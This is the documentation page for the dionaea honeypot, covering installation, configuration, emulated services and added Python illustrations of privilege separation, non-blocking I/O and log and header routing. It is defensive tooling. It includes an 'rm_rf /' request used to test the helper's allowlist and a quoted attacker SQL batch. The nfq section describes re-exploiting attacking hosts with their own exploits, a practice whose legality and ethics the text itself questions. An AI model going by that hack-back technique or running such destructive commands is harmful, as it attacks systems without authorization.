DIONAEA(1)                          dionaea                         DIONAEA(1)




NAME

       dionaea - dionaea Documentation

       Dionaea is meant to be a nepenthes successor.  It embeds Python as its
       scripting language, uses libemu to detect shellcode, and supports IPv6
       and TLS.

       WARNING:
          The documentation is work in progress.


INTRODUCTION

   How it works
       dionaea's intention is to trap malware that exploits vulnerabilities
       exposed by services offered to a network; the ultimate goal is gaining
       a copy of the malware.

   Security
       Software is likely to have bugs, bugs in software offering network
       services can be exploitable, and dionaea is software offering network
       services, so it is likely that dionaea has exploitable bugs.

       Of course we try to avoid them, but if nobody failed when trying hard,
       we would not need software such as dionaea.

       So, in order to minimize the impact, dionaea can drop privileges and
       chroot.

       To be able to run certain actions which require privileges after
       dionaea has dropped them, dionaea creates a child process at startup
       and asks that child process to run the actions which require elevated
       privileges.  This does not guarantee anything, but it should be harder
       to gain root access to the system from an unprivileged user in a
       chroot environment.

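       The following Python program is an added illustration of the startup
       pattern described above; it is not dionaea's own code.  A helper is
       forked before privileges are dropped, the main process then chroots
       and switches group and user in that order, and afterwards it can only
       ask the helper for a fixed set of named actions over a socketpair.
       The action names, the length-prefixed JSON framing and the demo()
       driver are this example's own inventions.  The helper is the one
       piece that keeps root, so it should expose as little as possible and
       refuse everything it does not recognise.  Run it as root with
       demo("nobody", "nogroup") to see the drop take effect; without root it
       keeps the current user and only exercises the helper channel.

```python
import json
import os
import pwd
import grp
import socket
import struct

# Actions the unprivileged main process may ask the privileged helper to run.
# The names and the two toy actions are this example's own; a real helper
# would expose only what it must (for example binding a low port).
ALLOWED_ACTIONS = {
    "ping": lambda args: {"pong": args.get("value")},
    "whoami": lambda args: {"uid": os.getuid(), "gid": os.getgid()},
}


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            return None
        buf += chunk
    return buf


def send_msg(sock, obj):
    """Length-prefixed JSON framing (this example's own wire format)."""
    data = json.dumps(obj).encode()
    sock.sendall(struct.pack("!I", len(data)) + data)


def recv_msg(sock):
    hdr = _recv_exact(sock, 4)
    if hdr is None:
        return None
    body = _recv_exact(sock, struct.unpack("!I", hdr)[0])
    return None if body is None else json.loads(body.decode())


def helper_loop(sock):
    """Runs in the child that keeps its privileges; exits when the parent closes the channel."""
    while True:
        req = recv_msg(sock)
        if req is None:
            return
        action = ALLOWED_ACTIONS.get(req.get("action"))
        if action is None:
            send_msg(sock, {"error": "unknown action"})
        else:
            send_msg(sock, action(req.get("args", {})))


def start_privileged_helper():
    """Fork the helper *before* dropping privileges; returns (pid, parent end of channel)."""
    parent_end, child_end = socket.socketpair()
    pid = os.fork()
    if pid == 0:
        parent_end.close()
        try:
            helper_loop(child_end)
        finally:
            os._exit(0)
    child_end.close()
    return pid, parent_end


def drop_privileges(user=None, group=None, chroot_dir=None):
    """What -u/-g/-r do: chroot while still root, then setgid, then setuid
    (after setuid the process could no longer change its group).  Returns
    True if privileges were dropped, False when not running as root."""
    if os.getuid() != 0:
        return False
    if chroot_dir:
        os.chroot(chroot_dir)
        os.chdir("/")
    if group:
        os.setgid(grp.getgrnam(group).gr_gid)
    if user:
        os.setuid(pwd.getpwnam(user).pw_uid)
    return True


def request(chan, action, **args):
    send_msg(chan, {"action": action, "args": args})
    return recv_msg(chan)


def demo(user=None, group=None):
    """Start the helper, drop privileges, then show that only known actions are served."""
    pid, chan = start_privileged_helper()
    dropped = drop_privileges(user=user, group=group)
    ok = request(chan, "ping", value=42)
    helper_ids = request(chan, "whoami")
    refused = request(chan, "rm_rf", path="/")
    chan.close()
    os.waitpid(pid, 0)
    return {"dropped": dropped, "ok": ok, "helper": helper_ids, "refused": refused}


if __name__ == "__main__":
    print(demo("nobody", "nogroup"))
```

       The order inside drop_privileges() is the part worth remembering:
       chroot needs root, setgid must precede setuid, and anything the
       helper is willing to do for the main process is reachable by an
       attacker who owns the main process.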
   Network Connectivity
       Given the software's intended use, network I/O is crucial.  All network
       I/O is done within the main process in a so-called non-blocking manner.
       To understand non-blocking, imagine you have many pipes in front of
       you; these pipes can send you something, and you can put something
       into a pipe.  If you want to put something into a pipe while it is
       crowded, you would have to wait, and if you want to get something from
       a pipe and there is nothing, you would have to wait too.  Doing this
       pipe game non-blocking means you won't wait for the pipes to be
       writable/readable: you get something off a pipe once data arrives, and
       write once the pipe is not crowded.  If you want to write a large
       chunk to a pipe and the pipe is crowded after a small piece, you note
       the rest of the chunk you wanted to write, and wait for the pipe to
       get ready.

       DNS resolves are done using libudns, which is a neat non-blocking DNS
       resolving library with support for AAAA records and chained CNAMEs.
       So much about non-blocking.

       dionaea uses libev to get notified once it can act on a socket, read or
       write.

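       As an added illustration (not dionaea's code, which does this in C on
       top of libev), the following Python uses the standard selectors module
       to play the pipe game from the paragraph above: a write that does not
       fit into the kernel buffer is queued and flushed only when the socket
       is reported writable, and reads happen only on readiness, so the loop
       never blocks on either side.  The NonBlockingConn class, run_loop()
       and the transfer() driver are this example's own names, and the
       payload pushed through the socketpair is constructed.

```python
import selectors
import socket


class NonBlockingConn:
    """One end of a 'pipe': partial writes are remembered in `pending` and
    retried when the selector says the socket can take more."""

    def __init__(self, sock, sel):
        self.sock = sock
        self.sel = sel
        self.sock.setblocking(False)
        self.pending = bytearray()   # the rest of the chunk we could not write yet
        self.received = bytearray()
        self.sel.register(self.sock, selectors.EVENT_READ, self)

    def send(self, data):
        # Try the kernel buffer first; keep whatever did not fit and ask to be
        # woken up when the socket becomes writable.
        if not self.pending:
            try:
                sent = self.sock.send(data)
            except BlockingIOError:
                sent = 0
            data = data[sent:]
        if data:
            self.pending += data
            self.sel.modify(self.sock, selectors.EVENT_READ | selectors.EVENT_WRITE, self)

    def on_writable(self):
        try:
            sent = self.sock.send(self.pending)
        except BlockingIOError:
            return
        del self.pending[:sent]
        if not self.pending:
            # Nothing left: stop asking for write readiness (otherwise it fires constantly).
            self.sel.modify(self.sock, selectors.EVENT_READ, self)

    def on_readable(self):
        try:
            chunk = self.sock.recv(65536)
        except BlockingIOError:
            return True
        if not chunk:
            return False          # peer closed
        self.received += chunk
        return True


def run_loop(sel, done):
    """Dispatch readiness events (the role libev callbacks play in dionaea) until done() holds."""
    while not done():
        for key, events in sel.select(timeout=1.0):
            conn = key.data
            if events & selectors.EVENT_WRITE:
                conn.on_writable()
            if events & selectors.EVENT_READ:
                conn.on_readable()


def transfer(payload):
    """Push payload from a to b through a socketpair; returns (bytes received, bytes queued
    after the first non-blocking send)."""
    sel = selectors.DefaultSelector()
    a_sock, b_sock = socket.socketpair()
    a = NonBlockingConn(a_sock, sel)
    b = NonBlockingConn(b_sock, sel)
    a.send(payload)
    queued = len(a.pending)
    run_loop(sel, lambda: len(b.received) >= len(payload))
    sel.close()
    a_sock.close()
    b_sock.close()
    return bytes(b.received), queued


if __name__ == "__main__":
    data = bytes(range(256)) * 32768          # constructed 8 MiB payload
    got, queued = transfer(data)
    print(len(got) == len(data), "bytes queued after first send:", queued)
```

       The 8 MiB payload is far larger than a socketpair's kernel buffer, so
       the first send() returns short and the remainder has to be drained
       through on_writable() while the reader empties the other end; the
       same bookkeeping is what lets dionaea apply per-connection rate
       limits, because every byte passes through a queue it controls.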
       dionaea can offer services via TCP/UDP and TLS for IPv4 and IPv6, and
       can apply rate limiting and accounting limits per connection to TCP
       and TLS connections, if required.


INSTALLATION

       At the time of writing the best choice to install dionaea on a server
       is to use Ubuntu 14.04, but below you can find how to install it (from
       source) on other distributions/operating systems.

   Basic stuff
   Download the source code
       You can download the source code from the release page or by using the
       git command.

          git clone https://github.com/DinoTools/dionaea.git
          cd dionaea

   Arch Linux
       Packages for dionaea are available from the Arch User Repository (AUR).
       Use a package manager like yaourt that can handle and install packages
       from the AUR.

       Before you start, install the required build tools.

          $ yaourt -S base-devel

       After the requirements have been installed successfully you can install
       dionaea.  This will check out the latest sources from the git
       repository, run the build process and install the package.

          $ yaourt -S dionaea-git

       After the installation has been completed you may want to edit the
       config file /etc/dionaea/dionaea.conf.  If everything looks fine the
       dionaea service can be started by using the following command.

          $ sudo systemctl start dionaea

       The log files and everything captured can be found in the directory
       /var/lib/dionaea/.

   Ubuntu 16.04
   From Source
       Before you start, download the source code of dionaea.

       Install the required build dependencies before configuring and building
       dionaea (ttf-liberation is required by util/gnuplotsql.py).

          sudo apt-get install \
              autoconf \
              automake \
              build-essential \
              check \
              cython3 \
              libcurl4-openssl-dev \
              libemu-dev \
              libev-dev \
              libglib2.0-dev \
              libloudmouth1-dev \
              libnetfilter-queue-dev \
              libnl-3-dev \
              libpcap-dev \
              libssl-dev \
              libtool \
              libudns-dev \
              python3 \
              python3-dev \
              python3-bson \
              python3-yaml \
              ttf-liberation

       After all dependencies have been installed successfully run autoreconf
       to build or rebuild the build scripts.

          autoreconf -vi

       Run configure to configure the build scripts.

          ./configure \
              --disable-werror \
              --prefix=/opt/dionaea \
              --with-python=/usr/bin/python3 \
              --with-cython-dir=/usr/bin \
              --with-ev-include=/usr/include/ \
              --with-ev-lib=/usr/lib \
              --with-emu-lib=/usr/lib/libemu \
              --with-emu-include=/usr/include \
              --with-nl-include=/usr/include/libnl3 \
              --with-nl-lib=/usr/lib

       Now you should be able to run make to build and run make install to
       install the honeypot.

          make
          sudo make install

       The new honeypot can be found in the directory /opt/dionaea.

   Ubuntu 14.04
   Package based
       Nightly packages are provided in a Personal Package Archive (PPA).
       Before you start you should update all packages to get the latest
       security updates.

          $ sudo apt-get update
          $ sudo apt-get dist-upgrade

       First of all install the tools to easily manage PPA resources.

          $ sudo apt-get install software-properties-common

       After the required tools have been installed you can add the PPA and
       update the package cache.

          $ sudo add-apt-repository ppa:honeynet/nightly
          $ sudo apt-get update

       If everything worked without any errors you should be able to install
       the dionaea package.

          $ sudo apt-get install dionaea

       After the installation has been completed you may want to edit the
       config file /etc/dionaea/dionaea.conf.  If everything looks fine the
       dionaea service can be started by using the following command.

          $ sudo service dionaea start

       The log files can be found in the directory /var/log/dionaea/ and
       everything else captured and logged by the honeypot can be found in the
       directory /var/lib/dionaea/.

   From Source
       Before you start, download the source code of dionaea.

       Install the required build dependencies before configuring and building
       dionaea.

          $ sudo apt-get install \
              autoconf \
              automake \
              build-essential \
              check \
              cython3 \
              libcurl4-openssl-dev \
              libemu-dev \
              libev-dev \
              libglib2.0-dev \
              libloudmouth1-dev \
              libnetfilter-queue-dev \
              libnl-dev \
              libpcap-dev \
              libssl-dev \
              libtool \
              libudns-dev \
              python3 \
              python3-dev \
              python3-bson \
              python3-yaml

       After all dependencies have been installed successfully run autoreconf
       to build or rebuild the build scripts.

          autoreconf -vi

       Run configure to configure the build scripts.

          ./configure \
              --disable-werror \
              --prefix=/opt/dionaea \
              --with-python=/usr/bin/python3 \
              --with-cython-dir=/usr/bin \
              --with-ev-include=/usr/include \
              --with-ev-lib=/usr/lib \
              --with-emu-lib=/usr/lib/libemu \
              --with-emu-include=/usr/include \
              --with-nl-include=/usr/include/libnl3 \
              --with-nl-lib=/usr/lib

       Now you should be able to run make to build and run make install to
       install the honeypot.

          make
          sudo make install

       The new honeypot can be found in the directory /opt/dionaea.

   3rd-party packages
       The packages below are 3rd party provided, which is appreciated.  If
       you have compiled a package for your own distribution, just send me the
       link or make a pull request.


CONFIGURATION

       If you want to change the software, it is really important to
       understand how it works, therefore please take the time to read how it
       works.  dionaea.cfg is the main configuration file.  In the example
       below you can see the default configuration.

       dionaea.cfg:

          [dionaea]
          download.dir=/var/lib/dionaea/binaries/
          modules=curl,python,nfq,emu,pcap
          processors=filter_streamdumper,filter_emu

          listen.mode=getifaddrs
          # listen.addresses=127.0.0.1
          # listen.interfaces=eth0,tap0

          # Country
          # ssl.default.c=GB
          # Common Name/domain name
          # ssl.default.cn=
          # Organization
          # ssl.default.o=
          # Organizational Unit
          # ssl.default.ou=

          [logging]
          default.filename=/var/log/dionaea/dionaea.log
          default.levels=all
          default.domains=*

          errors.filename=/var/log/dionaea/dionaea-errors.log
          errors.levels=warning,error
          errors.domains=*

          [processor.filter_emu]
          name=filter
          config.allow.0.protocols=smbd,epmapper,nfqmirrord,mssqld
          next=emu

          [processor.filter_streamdumper]
          name=filter
          config.allow.0.types=accept
          config.allow.1.types=connect
          config.allow.1.protocols=ftpctrl
          config.deny.0.protocols=ftpdata,ftpdatacon,xmppclient
          next=streamdumper

          [processor.streamdumper]
          name=streamdumper
          config.path=/var/lib/dionaea/bistreams/%Y-%m-%d/

          [processor.emu]
          name=emu
          config.limits.files=3
          #512 * 1024
          config.limits.filesize=524288
          config.limits.sockets=3
          config.limits.sustain=120
          config.limits.idle=30
          config.limits.listen=30
          config.limits.cpu=120
          #// 1024 * 1024 * 1024
          config.limits.steps=1073741824

          [module.nfq]
          queue=2

          [module.nl]
          # set to yes in case you are interested in the mac address of the remote (only works for lan)
          lookup_ethernet_addr=no

          [module.python]
          imports=dionaea.log,dionaea.services,dionaea.ihandlers
          sys_paths=default
          service_configs=/etc/dionaea/services-enabled/*.yaml
          ihandler_configs=/etc/dionaea/ihandlers-enabled/*.yaml

          [module.pcap]
          any.interface=any


   dionaea
       download.dir
          Global download directory used by some ihandlers.

       listen.mode
          There are basically three modes how dionaea can bind the services to
          IP addresses.

          · getifaddrs - auto
                 This will get a list of all IP addresses of all available
                 interfaces and bind the services to each IP.  It is also
                 possible to specify a list of interfaces to use by using
                 the listen.interfaces parameter.

          · manual - your decision
                 In this mode you have to specify an additional parameter,
                 listen.addresses.  This is a comma separated list of IP
                 addresses dionaea should bind the services to.

          · nl - will require a list of interfaces
                 You have to specify a comma separated list of interface
                 names with the listen.interfaces parameter.  If an IP
                 address is added to an interface or removed from an
                 interface, dionaea will launch or stop all services for
                 this IP.

       modules
          Comma separated list of modules.

       processors
          Comma separated list of processors.

       ssl.default.c
          Two letter id of the Country.

       ssl.default.cn
          The Common Name/domain name of the generated SSL/TLS certificate.

       ssl.default.o
          The Organization name.

       ssl.default.ou
          The name of the Organizational Unit.

   Logging
       dionaea has a general application log.  These logs are meant to be
       used for debugging and to track errors.  It is not recommended to
       analyse these files to track attacks.

       filename
          The filename of the logfile.

       levels
          Only log messages that match the specified log levels get logged to
          the logfile.

          Available log levels:

          · debug

          · info

          · warning

          · error

          · critical

          · all = Special log level including all log levels

          Examples: Log only messages with level warning and error.

              errors.levels=warning,error

          Log all log messages but exclude messages with log level debug.

              errors.levels=all,-debug

       domains
          Only log messages in the specified domains.  Use * and ? as
          wildcards, combine entries with ',' and exclude with a - prefix
          (the same syntax the -L command line flag accepts).

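       To make the level and domain syntax concrete, here is an added Python
       example (not dionaea's own logging code) that resolves a levels
       specification such as all,-debug into a set, matches a domain against
       a wildcard list, and groups the dotted keys of a [logging] section
       into per-sink settings.  The SAMPLE_CFG text is constructed in the
       shape of the default file above; the level name "message" is taken
       from the -H help output later on this page.  One thing the page does
       not state is how conflicting domain entries are ordered, so this
       example applies them left to right and lets the last match decide;
       that rule is an assumption.

```python
import configparser
import fnmatch

# Level names as listed by `dionaea -H` ("message" appears in the -l help but
# not in the [logging] list above); "all" expands to every one of them.
LEVELS = ("debug", "info", "message", "warning", "error", "critical")

# Constructed [logging] section in the style of dionaea.cfg (not the shipped file).
SAMPLE_CFG = """
[logging]
default.filename=/var/log/dionaea/dionaea.log
default.levels=all,-debug
default.domains=*

errors.filename=/var/log/dionaea/dionaea-errors.log
errors.levels=warning,error
errors.domains=*,-py*
"""


def resolve_levels(spec):
    """Expand 'all,-debug' or 'warning,error' into the set of selected levels,
    applying entries left to right so '-x' removes what an earlier 'all' added."""
    selected = set()
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        negate = item.startswith("-")
        name = item.lstrip("-")
        names = set(LEVELS) if name == "all" else {name}
        unknown = names - set(LEVELS)
        if unknown:
            raise ValueError("unknown log level(s): " + ", ".join(sorted(unknown)))
        selected = selected - names if negate else selected | names
    return selected


def domain_matches(spec, domain):
    """'*' and '?' wildcards, ',' to combine, '-' prefix to exclude.  Entries are
    applied left to right and the last one that matches decides (this example's
    conflict rule; the page does not say how dionaea orders them)."""
    verdict = False
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        negate = item.startswith("-")
        if fnmatch.fnmatchcase(domain, item.lstrip("-")):
            verdict = not negate
    return verdict


def load_log_sinks(text):
    """Group the dotted keys of [logging] (errors.levels, errors.domains, ...)
    by sink name and pre-resolve each sink's level set."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    sinks = {}
    for key, value in cp.items("logging"):
        sink, option = key.split(".", 1)
        sinks.setdefault(sink, {})[option] = value
    for sink in sinks.values():
        sink["levels"] = resolve_levels(sink.get("levels", "all"))
    return sinks


def should_log(sink, level, domain):
    """True when a message of this level/domain reaches the sink's file."""
    return level in sink["levels"] and domain_matches(sink.get("domains", "*"), domain)


def route(sinks, level, domain):
    """Sorted names of the sinks a message would be written to."""
    return sorted(name for name, sink in sinks.items() if should_log(sink, level, domain))


if __name__ == "__main__":
    sinks = load_log_sinks(SAMPLE_CFG)
    for level, domain in [("warning", "connection"), ("warning", "python"), ("debug", "connection")]:
        print(level, domain, "->", route(sinks, level, domain))
```

       A practical use of should_log() is to check a new sink definition
       before restarting the honeypot: an unknown level name raises instead
       of silently selecting nothing, which is the failure mode that leaves
       an operator with an empty error log.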
   Modules
       Only modules specified by the modules value in the dionaea section are
       loaded during the start up.

       Every module might have its own config section with additional config
       parameters.  The section name consists of the prefix module and the
       module name separated by a dot (.).

       See the module/index documentation to find more information on how to
       configure the modules.

   Processors
       The specified processors will be used as an entry point in the
       processing pipeline.  In most cases the initial processor will be a
       filter processor <processor/filter>.  The next processor in the
       pipeline is specified by the next parameter.

       See the processor/index documentation to find more information on how
       to configure the processors.


RUNNING DIONAEA

       The software has some flags you can provide at startup; the -h flag
       shows the help, the -H flag includes the default values.

          $ /opt/dionaea/bin/dionaea -H
            -c, --config=FILE               use FILE as configuration file
                                              Default value/behaviour: /opt/dionaea/etc/dionaea/dionaea.cfg
            -D, --daemonize                 run as daemon
            -g, --group=GROUP               switch to GROUP after startup (use with -u)
                                              Default value/behaviour: keep current group
            -G, --garbage=[collect|debug]   garbage collect,  usefull to debug memory leaks,
                                            does NOT work with valgrind
            -h, --help                      display help
            -H, --large-help                display help with default values
            -l, --log-levels=WHAT           which levels to log, valid values
                                            all, debug, info, message, warning, critical, error
                                            combine using ',', exclude with - prefix
            -L, --log-domains=WHAT          which domains use * and ? wildcards, combine using ',',
                                            exclude using -
            -u, --user=USER                 switch to USER after startup
                                              Default value/behaviour: keep current user
            -p, --pid-file=FILE             write pid to file
            -r, --chroot=DIR                chroot to DIR after startup
                                              Default value/behaviour: don't chroot
            -V, --version                   show version
            -w, --workingdir=DIR            set the process' working dir to DIR
                                              Default value/behaviour: /opt/dionaea

          examples:
              # dionaea -l all,-debug -L '*'
              # dionaea -l all,-debug -L 'con*,py*'
              # dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/var/run/dionaea.pid


INTEGRATION

       A list of applications and tools to collect information exported by
       dionaea.

   DTAG Community Honeypot Project
       The DTAG Community Honeypot Project has been started in 2010 by a small
       group of enthusiasts of the Deutsche Telekom.  They are maintaining
       T-Pot, a Multi-Honeypot Platform.  It is based on well established
       honeypots including dionaea.

       · Website: DTAG Community Honeypot Project

       · Status: active

   DionaeaFR
       DionaeaFR is a web-frontend to display attack information.  It uses the
       SQLite database provided by the log_sqlite ihandler.

       · Website: DionaeaFR

       · Status: unmaintained since 2014

   DIY with log_json
       You can use the log_json incident handler in combination with an ELK
       stack to collect, aggregate and visualize attack information.

       · Website: ELK stack

       · Status: active

   Modern Honey Network (mhn)
       A tool to deploy honeypots, collect attack information and display
       aggregated statistics.

       · Website: Modern Honey Network

       · Status: active, but deploys a pre-0.2 (2014) version of dionaea by
         default.


MODULES

       The subsection's name is the name of the module dionaea will try to
       load.  Most modules have rather simple names: the pcap module will use
       libpcap, the curl module libcurl, the emu module libemu … The python
       module is special, as the python module can load Python scripts which
       offer services, and each service can have its own options.

       List of available modules

   curl
       The curl module is used to transfer files from and to servers; it is
       used to download files via HTTP as well as to submit files to 3rd
       parties.

   emu
       The emu module is used to detect, profile and - if required - execute
       shellcode.

   pcap
       The pcap module uses the libpcap library to detect rejected connection
       attempts, so even if we do not accept a connection, we can record that
       somebody wanted to connect there.

   python
       The python module allows using the Python interpreter in dionaea, and
       allows controlling some scripts dionaea uses.


SERVICE

       Network services speak a certain language; this language is called a
       protocol.  When we started deploying honeypots, you could trap worms
       just by opening a single port and waiting for them to connect and send
       you a URL where you could download a copy of the worm.  The service
       getting attacked was the backdoor of the Bagle mail worm, and it did
       not require any interaction.  Later on, the exploitation of real
       services got more complex, and you had to reply something to the worm
       to fool it.  Nowadays worms use the API to access services before
       sending their payload.  To allow easy adjustments to the protocol,
       dionaea implements the protocols in Python.  There is a glue between
       the network layer, which is done in the C programming language, and
       the embedded Python scripting language, which allows using the
       non-blocking connections in Python.  This has some benefits: for
       example we can use non-blocking TLS connections in Python, and we even
       get rate limiting on them (if required), where Python's own I/O does
       not offer such things.  On the other hand, it is much more comfortable
       to implement protocols in Python than doing the same in C.

       List of available services

   Black hole
       The black hole module can be used to bind a service to a port.  The
       service does not respond to any submitted data, but the bistreams can
       be used to create new modules.

   Example config
       services/blackhole.yaml:

          - name: blackhole
            config:
              services:
                # Telnet
                - port: 23
                  protocol: tcp

                # DNS
                - port: 53
                  protocol: udp
                - port: 53
                  protocol: tcp

                # NTP
                - port: 123
                  protocol: udp


   EPMAP
   Example config
       services/epmap.yaml:

          - name: epmap


   FTP
       Dionaea provides a basic FTP server on port 21; it can create
       directories and upload and download files.  From my own experience
       there are very few automated attacks on FTP services and I'm yet to
       see something interesting happening on port 21.

   Example config
       services/ftp.yaml:

          - name: ftp
            config:
              root: /var/lib/dionaea/roots/ftp
              response_messages:
                welcome_msg: 220 DiskStation FTP server ready.


   HTTP
       Dionaea supports HTTP on port 80 as well as HTTPS, but there is no code
       making use of the data gathered on these ports.  For HTTPS, the
       self-signed SSL certificate is created at startup.

   Configure
       Example configuration:

          - name: http
            config:
              root: "var/dionaea/wwwroot"

       default_headers
          Default header fields are sent if none of the other header patterns
          match.

       global_headers
          Global header fields are added to all response headers.

       headers
          List of header fields to be used in the response header.  Only
          applied if filename_pattern, status_code and methods match.  The
          first match in the list is used.

       max_request_size
          Maximum size in kbytes of the request.  32768 = 32MB

       root
          The root directory to serve files from.

   Example config
       services/http.yaml:

          - name: http
            config:
              root: "/var/lib/dionaea/roots/www"
              ports:
                - 80
              ssl_ports:
                - 443
              max_request_size: 32768 # maximum size in kbytes of the request (32MB)
              global_headers:
                - ["Server", "nginx"]
              headers:
                - filename_pattern: ".*\\.php"
                  headers:
                    - ["Content-Type", "text/html; charset=utf-8"]
                    - ["Content-Length", "{content_length}"]
                    - ["Connection", "{connection}"]
                    - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
              # soap_enabled: false
              template:
                # set to true to enable template processing
                # this feature requires jinja2 template engine http://jinja.pocoo.org/
                enabled: false
                file_extension: .j2
                path: "/var/lib/dionaea/share/python/http/template/nginx"
                templates:
                  autoindex:
                    filename: autoindex.html.j2
                  error_pages:
                    - filename: error.html.j2
                    # - filename: error/{code}.html.j2
                # used to specify additional template values
                values:
                  # full_name: nginx/1.1


   Additional examples
       Set the Server response field.

          - name: http
            config:
              global_headers:
                - ["Server", "nginx"]

       Define headers to use if the filename matches a pattern.

          - name: http
            config:
              headers:
                - filename_pattern: ".*\\.php"
                  headers:
                    - ["Content-Type", "text/html; charset=utf-8"]
                    - ["Content-Length", "{content_length}"]
                    - ["Connection", "{connection}"]
                    - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]

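       The header options above interact (first matching headers rule, else
       default_headers, with global_headers appended to either), and the
       following added Python example shows that selection logic end to end.
       It is an illustration, not the http service's own code.  HTTP_CONFIG
       mirrors the services/http.yaml example as a dict; the default_headers
       entries and the 404 rule are constructed, since the page shows only
       global_headers and the .php rule.  Matching filename_pattern with
       re.match, accepting status_code and methods as either a scalar or a
       list, and treating an absent constraint as "matches anything" are this
       example's assumptions about the semantics.

```python
import re

# Constructed service config in the shape of services/http.yaml above, as a
# Python dict.  The default_headers entries and the 404 rule are this
# example's own; the page shows only global_headers and the .php rule.
HTTP_CONFIG = {
    "global_headers": [["Server", "nginx"]],
    "default_headers": [
        ["Content-Type", "text/html; charset=utf-8"],
        ["Content-Length", "{content_length}"],
        ["Connection", "{connection}"],
    ],
    "headers": [
        {
            "filename_pattern": r".*\.php",
            "methods": ["GET", "POST"],
            "headers": [
                ["Content-Type", "text/html; charset=utf-8"],
                ["Content-Length", "{content_length}"],
                ["Connection", "{connection}"],
                ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"],
            ],
        },
        {
            "status_code": [404],
            "headers": [["Content-Type", "text/html"], ["Content-Length", "{content_length}"]],
        },
    ],
}


def _as_list(value):
    if value is None:
        return None
    return list(value) if isinstance(value, (list, tuple, set)) else [value]


def rule_matches(rule, filename, status_code, method):
    """A rule applies only if every constraint it carries matches; absent
    constraints match anything (this example's reading of the page)."""
    pattern = rule.get("filename_pattern")
    if pattern is not None and re.match(pattern, filename) is None:
        return False
    codes = _as_list(rule.get("status_code"))
    if codes is not None and status_code not in codes:
        return False
    methods = _as_list(rule.get("methods"))
    if methods is not None and method.upper() not in [m.upper() for m in methods]:
        return False
    return True


def select_headers(config, filename, status_code=200, method="GET",
                   content_length=0, connection="close"):
    """First matching `headers` rule wins, else default_headers; global_headers
    are appended to whichever was chosen.  {content_length} / {connection}
    placeholders are filled from the response being built."""
    chosen = None
    for rule in config.get("headers", []):
        if rule_matches(rule, filename, status_code, method):
            chosen = rule.get("headers", [])
            break
    if chosen is None:
        chosen = config.get("default_headers", [])
    values = {"content_length": content_length, "connection": connection}
    out = []
    for name, value in list(chosen) + list(config.get("global_headers", [])):
        out.append((name, str(value).format(**values)))
    return out


def render_head(status_code, reason, headers):
    """Serialize the status line and header list as they go on the wire."""
    lines = ["HTTP/1.1 %d %s" % (status_code, reason)]
    lines += ["%s: %s" % (name, value) for name, value in headers]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


if __name__ == "__main__":
    hdrs = select_headers(HTTP_CONFIG, "/index.php", content_length=12, method="POST")
    print(render_head(200, "OK", hdrs).decode())
```

       When you write such rules, keep the fingerprint consistent: a
       Server: nginx header combined with an X-Powered-By value that nginx
       installations do not normally emit is exactly the kind of mismatch a
       scanner fingerprinting honeypots looks for, so pick header values
       that belong to one real deployment.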
   Memcache
       Dionaea can emulate a very basic memcached server.

   Configure
   Example config
       services/memcache.yaml:

          - name: memcache


   Mirror
   Example config
       services/mirror.yaml:

          - name: mirror


   MongoDB
       This module adds initial support for emulating a MongoDB server with
       the dionaea honeypot.  At the moment it is very limited and the
       functionality might be improved in one of the next releases.

   Requirements
       · bson module for Python 3

   Example config
       services/mongo.yaml:

          - name: mongo


   MQTT
   Example config
       services/mqtt.yaml:

          - name: mqtt


   MSSQL
       This module implements the Tabular Data Stream protocol which is used
       by Microsoft SQL Server.  It listens on tcp/1433 and allows clients to
       log in.  It can decode queries run on the database, but as there is no
       database, dionaea can't reply, and there is no further action.
       Typically we always get the same query batch:

          exec sp_server_info 1
          exec sp_server_info 2
          exec sp_server_info 500
          select 501,NULL,1 where 'a'='A'
          select 504,c.name,c.description,c.definition from master.dbo.syscharsets c,master.dbo.syscharsets c1,master.dbo.sysconfigures f where f.config=123 and f.value=c1.id and c1.csid=c.id
          set textsize 2147483647
          set arithabort on

       Refer to the blog <http://carnivore.it/2010/09/11/mssql_attacks_examined>
       for more information.  Patches would be appreciated.

   Example config
       services/mssql.yaml:

          - name: mssql


   MySQL
       This module implements the MySQL wire protocol, backed by SQLite as
       the database.  Please refer to 2011-05-15 Extending Dionaea
       <http://carnivore.it/2011/05/15/extending_dionaea> for more information.

   Example config
       services/mysql.yaml:

          - name: mysql
            config:
              databases:
                information_schema:
                  path: ":memory:"
                # example how to extend this
                # just provide a databasename and path to the database
                # the database can be altered by attackers, so ... better use a copy
          #      psn:
          #        path: "/path/to/cc_info.sqlite"


775   nfq
776       The  python nfq script is the counterpart to the nfq module.  While the
777       nfq module interacts with the kernel, the nfq python script takes  care
778       of  the  required  steps  to start a new service on the ports.  nfq can
779       intercept incoming tcp connections during the tcp handshake giving your
780       honeypot  the  possibility  to  provide  service on ports which are not
781       served by default.
782
783       As dionaea can not predict which protocol will  be  spoken  on  unknown
784       ports,  neither  implement  the protocol by itself, it will connect the
785       attacking host on the same port, and use the attackers server side pro‐
786       tocol  implementation  to  reply to the client requests of the attacker
787       therefore dionaea can end up re?exploiting the attackers machine,  just
788       by sending him the exploit he sent us.
789
790       The  technique  is  a brainchild of Tillmann Werner, who used it within
791       his honeytrap <http://honeytrap.carnivore.it> honeypot.   Legal  bound‐
792       aries  to  such  behaviour may be different in each country, as well as
793       ethical boundaries for each individual.  From a technical point of view
794       it works, and gives good results.  Learning from the best, I decided to
795       adopt this technique for dionaea.  Besides the legal and ethical issues
796       with  this  approach,  there are some technical things which have to be
797       mentioned
798
       port scanning
          If your honeypot gets port scanned, it would open a service for each
          port scanned; in the worst case you'd end up offering 64k services
          per scanned ip.  By default you'd run out of fds at about 870 ser‐
          vices offered and experience weird behaviour.  Therefore the impact
          of port scanning has to be limited.  The kiss approach taken here is
          a sliding window of throttle.window seconds.  Each slot in this
          sliding window represents one second, and the slot is incremented
          for each connection accepted.  Before a connection is accepted, the
          sum of all slots is checked against throttle.limits.total; if the
          sum is not below the limit, no new service is created.  If the sum
          is below the limit, the current slot is checked against
          throttle.limits.slot as well, and only if both conditions hold is a
          new service created.  If either condition fails, no service is
          spawned and the packet is left to nfqueue.  There are two ways to
